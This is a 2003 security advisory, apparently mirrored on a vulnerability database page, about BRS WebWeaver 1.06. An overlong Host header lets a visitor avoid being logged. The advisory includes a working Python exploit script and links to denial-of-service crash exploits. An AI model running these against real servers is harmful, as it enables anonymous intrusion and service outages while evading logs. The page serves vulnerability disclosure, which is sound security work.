Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BRSwebweaver.txt

🗓️ 25 Sep 2003 00:00:00Reported by euronymousType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

BRS WebWeaver 1.06 allows anonymous surfing due to a logging bypass vulnerability, high risk.

Code
`=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=  
topic: BRS WebWeaver: Anonymous Surfing  
product: BRS WebWeaver 1.06  
vendor: http://www.brswebweaver.com  
risk: high  
date: 09/24/2k3  
discovered by: euronymous /F0KP   
advisory urls: http://f0kp.iplus.ru/bz/027_en  
http://f0kp.iplus.ru/bz/027_ru   
contact email: euronymous at iplus dot ru  
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=  
  
0x01. Anonymous surfing  
=======================  
  
WebWeaver 1.06 and probably prior versions will allow `anonymous surfing' with  
some trick. If you request the http server with long `Host' field of HTTP  
packet, then Webweaver dont logs your IP adrress in server log:  
  
HTTP Server Started - 24/Sep/2003:18:13:39  
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"  
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"  
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"  
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"  
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"  
  
  
HTTP server response:  
---------------------   
  
HTTP/1.0 414 Request-URI Too Large  
Sever: BRS WebWeaver/1.06  
Date: Wed, 24 Sep 2003 14:16:11 GMT  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request  
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi  
s server.</BODY></HTML>  
  
  
Exploit code:  
-------------  
  
#! /usr/bin/env python  
##  
# by euronymous [ http://f0kp.iplus.ru ]  
#  
# Usage: ./WWanon.py <target_host>  
##  
  
import sys, socket  
  
H0ST = sys.argv[1]  
BUF = 'fp' * 0x815F  
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
f.connect((H0ST,80))  
f.send('GET / HTTP/1.1\r\n')  
f.send('Host: '+BUF+'\n\n')   
WWout = f.recv(1024)  
f.close  
print WWout  
  
  
0x02. Remote crashes again  
==========================  
  
WW author was unable to fix early overflow conditions in his crappy proggie, he  
is just increases the vulnerable buffer size. Therefore, you still can to crash  
any WW instances with exploits, released earlier, but you have to change size of  
request in exploit code. Using technik, that mentioned above, you can DoS  
anonymously.  
  
Exploit urls:  
  
[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.  
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST  
  
  
0x03. Greetings  
===============  
  
Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Sep 2003 00:00Current
7.4High risk
Vulners AI Score7.4
brs webweaveranonymous surfinglogging bypasshigh riskvulnerabilityexploit code.
36